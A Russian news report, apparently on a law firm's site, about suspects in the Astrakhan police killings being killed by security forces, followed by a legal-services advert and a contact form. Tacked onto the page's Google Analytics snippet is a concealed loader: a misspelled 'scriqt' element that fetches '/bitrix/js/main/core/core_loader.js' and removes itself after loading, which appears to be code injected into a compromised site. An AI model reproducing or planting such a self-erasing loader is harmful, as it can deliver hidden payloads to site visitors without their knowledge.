Трое подозреваемых в убийстве полицейских в Астрахани ликвидированы

Трое подозреваемых в убийстве полицейских в Астрахани ликвидированы

МОСКВА, 6 апреля.Полицейские совместно с бойцами Росгвардии ликвидировали троих подозреваемых в убийстве сотрудников полиции в Астрахани. Об этом ТАСС сообщила официальный представитель МВД Ирина Волк.

«Утром 6 апреля в ходе оперативно-розыскных мероприятий по розыску и задержанию лиц, совершивших нападение на сотрудников Росгвардии, в Ленинском районе города Астрахани и убийстве сотрудников ДПС 4 апреля текущего года, сотрудниками полиции совместно с подразделениями Росгвардии и ФСБ России были обнаружены и ликвидированы трое подозреваемых», — сказала она.

Ранее в Росгвардии и Следственном комитете сообщали о ликвидации четырех подозреваемых в нападении на полицейских.
«Преступники, расстрелявшие 4 апреля двух сотрудников ГИБДД и напавшие сегодня ночью на сотрудников Росгвардии, ликвидированы. Они были окружены нашими сотрудниками и убиты в рамках спецоперации. Таким образом, все четыре преступника ликвидированы», — заявляли в управлении.

«На месте спецоперации уже работает следственно-оперативная группа», — уточнил старший помощник руководителя следственного управления СК РФ по региону Андрей Хегай.

По информации областного УМВД, в ночь на четверг при попытке остановить автомобиль в рамках розыскных мероприятий примерно в 01:40 (00:40 мск) по местному времени неизвестные открыли огонь по сотрудникам Росгвардии. Были ранены трое полицейских, один из них находится в тяжелом состоянии. Ответным огнем был убит один из нападавших, еще один ранен. Предположительно, нападение совершили те же лица, что застрелили двух полицейских во вторник.

4 апреля примерно в 00:27 по местному времени в Астрахани неизвестные совершили вооруженное нападение на двух сотрудников ДПС, которые приехали на оформление ДТП. Злоумышленники произвели несколько выстрелов, в результате которых полицейские скончались на месте. Следственными органами было возбуждено уголовное дело, семь человек были объявлены в розыск, из них четверо — в международный. МВД РФ ранее объявило вознаграждение в 1 млн рублей за любые сведения о местонахождении подозреваемых.

Власти Астраханской области приняли решение оказать материальную помощь семьям погибших полицейских в размере одного млн рублей. Также глава региона Александр Жилкин заявил, что к убийству сотрудников ГИБДД причастна группа радикальных исламистов-ваххабитов.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');